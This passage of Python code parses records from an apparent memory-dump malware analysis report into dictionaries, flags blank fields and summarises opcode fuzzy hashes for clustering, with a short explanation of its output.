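    """Split report text into one dict per 'Memory Dump Source' record.

    Bullet lines are 'Key: value'; the Source File line packs three fields
    ('Source File', 'Offset', 'based on PE') separated by ', '.
    """
    records: List[Dict[str, str]] = []
    current: Dict[str, str] = {}
    for raw in text.splitlines():
        line = raw.strip()  # report text is heavily indented when extracted
        if not line:
            continue
        if line == RECORD_START:
            if current:
                records.append(current)
            current = {}
            continue
        if line in SECTION_LABELS:
            continue
        if line.startswith("•"):
            for part in line.lstrip("•").strip().split(", "):
                key, _, value = part.partition(":")
                current[key.strip()] = value.strip()
    if current:
        records.append(current)
    return records


def empty_fields(record: Dict[str, str]) -> List[str]:
    """Names of fields present in the record but left blank."""
    return [k for k, v in record.items() if v == ""]


def summarize(records: List[Dict[str, str]]) -> Dict[str, object]:
    """Aggregate facts an analyst wants before clustering on these hashes."""
    sources = Counter(
        (r.get("Source File"), r.get("Offset"), r.get("based on PE")) for r in records
    )
    return {
        "count": len(records),
        "sources": dict(sources),
        # In the report's records the Opcode ID equals the Opcode Fuzzy Hash,
        # so either field can serve as the clustering key.
        "opcode_id_equals_fuzzy": all(
            r.get("Opcode ID") == r.get("Opcode Fuzzy Hash") for r in records
        ),
        "distinct_opcode_hashes": len({r.get("Opcode Fuzzy Hash") for r in records}),
        "non_pe_backed": sum(1 for r in records if r.get("based on PE") == "false"),
    }


if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    for rec in recs:
        print(rec["Opcode Fuzzy Hash"], "blank:", empty_fields(rec))
    print(summarize(recs))
```

Run as a script it prints each record's opcode hash with its blank fields and then the summary; fed the full set of entries above (pasted into SAMPLE or read from a file) it reports a single (Source File, Offset, based on PE) tuple and one distinct opcode hash per entry, which is the shape you want before joining against hashes from other reports.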